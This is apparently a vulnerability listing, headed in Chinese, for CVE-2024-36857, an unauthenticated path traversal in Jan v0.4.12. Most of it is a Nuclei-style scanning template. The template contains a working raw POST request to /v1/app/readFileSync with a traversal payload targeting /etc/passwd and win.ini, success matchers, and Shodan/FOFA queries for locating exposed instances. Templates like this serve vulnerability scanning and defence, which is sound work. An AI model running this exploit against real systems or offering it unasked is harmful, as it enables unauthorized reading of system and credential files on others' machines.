漏洞描述
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
CVE-2024-36857: Jan v0.4.12 'readFileSync' - Path Traversal
PoC代码[已公开]
id: CVE-2024-36857
info:
name: Jan v0.4.12 'readFileSync' - Path Traversal
author: Yusuf Amr
severity: high
description: |
Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
impact: |
Unauthenticated attackers can read arbitrary files from the system via path traversal in the readFileSync interface.
remediation: |
Update Jan to a version later than v0.4.12 that patches the path traversal vulnerability.
reference:
- https://www.wiz.io/vulnerability-database/cve/cve-2024-36857
- https://github.com/HackAllSec/CVEs/tree/main/Jan%20AFR%20vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-36857
epss-score: 0.55135
epss-percentile: 0.97998
cpe: cpe:2.3:a:homebrew:jan:0.4.12:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: http.favicon.hash:"-165268926"
fofa-query: icon_hash="-165268926"
vendor: homebrew
product: jan
tags: cve,cve2024,jan,lfi,vkev,vuln
http:
- raw:
- |
POST /v1/app/readFileSync HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain;charset=UTF-8
["file:/../../../../../..{{path}}","utf-8"]
payloads:
path:
- '/etc/passwd'
- '/Windows/win.ini'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a0047304502202898b35aeef047225291df5c24dd5cad45e1fe4a1dce7fe12ef5b1cab9ae7a03022100baef49322020a9cccde025649c2a8c7934bd041e36946b590db446e5a8fd51b3:922c64590222798bb761d5b6d8e72950